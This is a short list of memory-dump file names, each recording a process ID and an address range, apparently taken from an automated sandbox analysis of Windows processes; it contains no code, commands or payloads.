memory/1208-405-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/1164-404-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/1208-400-0x000001F621C80000-0x000001F621CAB000-memory.dmp

memory/1096-413-0x000001FE6C0F0000-0x000001FE6C11B000-memory.dmp

memory/1208-411-0x000001F621C80000-0x000001F621CAB000-memory.dmp

memory/1252-415-0x000002256C9A0000-0x000002256C9CB000-memory.dmp

memory/740-417-0x000001AA35800000-0x000001AA3582B000-memory.dmp

memory/900-418-0x00000127A3960000-0x00000127A398B000-memory.dmp

memory/1068-421-0x000001A57AD60000-0x000001A57AD8B000-memory.dmp

memory/892-420-0x00000268B60C0000-0x00000268B60EB000-memory.dmp

memory/692-419-0x0000022CF2E30000-0x0000022CF2E5B000-memory.dmp

memory/1164-422-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp

memory/1252-423-0x000002256C9A0000-0x000002256C9CB000-memory.dmp